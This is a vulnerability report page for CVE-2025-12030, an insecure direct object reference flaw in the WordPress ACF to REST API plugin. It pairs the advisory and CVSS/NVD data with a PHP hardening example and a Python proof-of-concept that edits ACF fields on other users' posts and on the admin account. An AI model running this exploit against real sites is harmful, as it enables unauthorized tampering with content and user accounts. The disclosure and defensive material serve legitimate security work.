Security Vulnerability Report
CVE-2025-12030 CVSS 4.3 MEDIUM

CVE-2025-12030

Published: 2026-01-07 12:16:47
Last Modified: 2026-04-15 00:35:42

Description

The ACF to REST API plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.4. This is due to insufficient capability checks in the update_item_permissions_check() method, which only verifies that the current user has the edit_posts capability without checking object-specific permissions (e.g., edit_post($id), edit_user($id), manage_options). This makes it possible for authenticated attackers, with Contributor-level access and above, to modify ACF fields on posts they do not own, any user account, comments, taxonomy terms, and even the global options page via the /wp-json/acf/v3/{type}/{id} endpoints, granted they can authenticate to the site.
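To make the flaw concrete from the defender's side, here is an added illustrative PHP example (not the plugin's own code and not taken from the referenced controller file): a REST permission callback of the shape the advisory describes, which only tests the blanket `edit_posts` capability, beside a hardened version that maps the route's `{type}` to an object-specific capability and passes the `{id}` so WordPress's meta-capability mapping enforces ownership per object. The function names, the set of `{type}` slugs handled, the example handler, and the wiring through `WP_REST_Request`, `current_user_can()`, `WP_Error`, `register_rest_route()` and `rest_authorization_required_code()` are assumptions about how such a callback sits in the WordPress REST API; the plugin's real route handling may differ.

```php
<?php
/**
 * Added illustrative example, not the ACF to REST API plugin's own code.
 * Assumes a WordPress runtime (WP_REST_Request, current_user_can(), WP_Error,
 * get_post(), absint(), sanitize_key(), rest_authorization_required_code()).
 * The route shape /acf/v3/{type}/{id} comes from the advisory; how the plugin
 * itself reads {type} and {id} is an assumption here.
 */

// "Before": the kind of check the advisory describes. A blanket capability test
// says nothing about WHICH object is being written, so any Contributor (who has
// edit_posts) passes for every post, user, comment, term and the options page.
function vulnerable_update_item_permissions_check( WP_REST_Request $request ) {
    return current_user_can( 'edit_posts' );
}

// "After": resolve the object-specific capability for the {type} in the route and
// pass the {id}, so WordPress's map_meta_cap() decides per object. For example,
// edit_post on another author's post fails for a Contributor, and edit_user on
// another account fails for anyone without edit_users.
function hardened_update_item_permissions_check( WP_REST_Request $request ) {
    $type = isset( $request['type'] ) ? sanitize_key( $request['type'] ) : '';
    $id   = isset( $request['id'] ) ? absint( $request['id'] ) : 0;

    switch ( $type ) {
        case 'users':
            $allowed = $id > 0 && current_user_can( 'edit_user', $id );
            break;
        case 'comments':
            $allowed = $id > 0 && current_user_can( 'edit_comment', $id );
            break;
        case 'terms':
            $allowed = $id > 0 && current_user_can( 'edit_term', $id );
            break;
        case 'options':
            // The global options page has no per-object id; it is admin-only.
            $allowed = current_user_can( 'manage_options' );
            break;
        default:
            // Treat any other {type} as a post object (posts, pages, custom post
            // types). Resolving the post first means a non-existent id is denied,
            // and edit_post with the id enforces ownership and post status.
            $post    = get_post( $id );
            $allowed = $post instanceof WP_Post && current_user_can( 'edit_post', $post->ID );
            break;
    }

    if ( ! $allowed ) {
        // 401 for anonymous callers, 403 for authenticated but unauthorized ones.
        return new WP_Error(
            'rest_forbidden',
            'Sorry, you are not allowed to edit this object.',
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

// Hypothetical write handler: only reached once the permission callback returned true.
function example_acf_update_item( WP_REST_Request $request ) {
    return rest_ensure_response( array(
        'type' => sanitize_key( $request['type'] ),
        'id'   => absint( $request['id'] ),
    ) );
}

// Registration sketch: the hardened callback is what the update route's
// permission_callback should point at.
add_action( 'rest_api_init', function () {
    register_rest_route( 'acf/v3', '/(?P<type>[\w-]+)/(?P<id>\d+)', array(
        'methods'             => array( 'POST', 'PUT', 'PATCH' ),
        'callback'            => 'example_acf_update_item',
        'permission_callback' => 'hardened_update_item_permissions_check',
    ) );
} );
```

The design point is that the capability passed to `current_user_can()` must be the meta-capability for the specific object (`edit_post`, `edit_user`, `edit_comment`, `edit_term`) together with its id, never the role-level primitive (`edit_posts`) on its own; the primitive is what Contributors already hold, which is exactly why it cannot separate "my draft" from "someone else's post" (CWE-639). On the detection side, with per-object checks in place, write requests to `/wp-json/acf/v3/{type}/{id}` from low-privilege accounts against objects they do not own surface as 403 responses in the web server log and are a reasonable thing to alert on.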

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ACF to REST API plugin <= 3.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-12030 PoC - ACF to REST API IDOR Vulnerability
# Target: WordPress site with ACF to REST API plugin <= 3.3.4

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_contributor"  # Attacker account with Contributor role
PASSWORD = "attacker_password"


def get_auth_token():
    """Get WordPress REST API authentication token"""
    auth_url = f"{TARGET_URL}/wp-json/jwt-auth/v1/token"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = requests.post(auth_url, json=data)
    if response.status_code == 200:
        return response.json().get('token')
    return None


def exploit_idor():
    """Exploit IDOR vulnerability to modify arbitrary posts"""
    token = get_auth_token()
    if not token:
        print("[-] Authentication failed")
        return
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # Target a post owned by another user (IDOR)
    target_post_id = 999  # Target post ID to modify
    exploit_url = f"{TARGET_URL}/wp-json/acf/v3/posts/{target_post_id}"
    # Malicious ACF field data
    payload = {
        "fields": {
            "malicious_field": "injected_value"
        }
    }
    print(f"[*] Exploiting IDOR on post ID: {target_post_id}")
    response = requests.post(exploit_url, headers=headers, json=payload)
    if response.status_code in [200, 201]:
        print("[+] Successfully modified ACF fields on target post!")
        print(f"[+] Response: {response.json()}")
    else:
        print(f"[-] Exploitation failed: {response.status_code}")
        print(f"[-] Response: {response.text}")


def modify_user_acf(target_user_id):
    """Modify ACF fields on arbitrary user accounts"""
    token = get_auth_token()
    if not token:
        # Without a token the request would be sent as "Bearer None"
        print("[-] Authentication failed")
        return
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    exploit_url = f"{TARGET_URL}/wp-json/acf/v3/users/{target_user_id}"
    payload = {"fields": {"admin_note": "compromised"}}
    print(f"[*] Attempting to modify user ID: {target_user_id}")
    response = requests.post(exploit_url, headers=headers, json=payload)
    print(f"[*] Status: {response.status_code}")


if __name__ == "__main__":
    exploit_idor()
    # Modify target user (e.g., admin user ID 1)
    modify_user_acf(1)
```

References

https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L108
https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L120
https://www.wordfence.com/threat-intel/vulnerabilities/id/5ab508fa-298c-48c1-8510-f2e0a881675a?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12030",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-07T12:16:46.557",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The ACF to REST API plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.4. This is due to insufficient capability checks in the update_item_permissions_check() method, which only verifies that the current user has the edit_posts capability without checking object-specific permissions (e.g., edit_post($id), edit_user($id), manage_options). This makes it possible for authenticated attackers, with Contributor-level access and above, to modify ACF fields on posts they do not own, any user account, comments, taxonomy terms, and even the global options page via the /wp-json/acf/v3/{type}/{id} endpoints, granted they can authenticate to the site."
      },
      {
        "lang": "es",
        "value": "El plugin ACF to REST API para WordPress es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta la 3.3.4, inclusive. Esto se debe a comprobaciones de capacidad insuficientes en el método update_item_permissions_check(), que solo verifica que el usuario actual tiene la capacidad edit_posts sin verificar permisos específicos del objeto (por ejemplo, edit_post($id), edit_user($id), manage_options). Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, modifiquen campos ACF en publicaciones que no les pertenecen, cualquier cuenta de usuario, comentarios, términos de taxonomía, e incluso la página de opciones globales a través de los endpoints /wp-json/acf/v3/{type}/{id}, siempre que puedan autenticarse en el sitio."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L108",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L120",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5ab508fa-298c-48c1-8510-f2e0a881675a?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```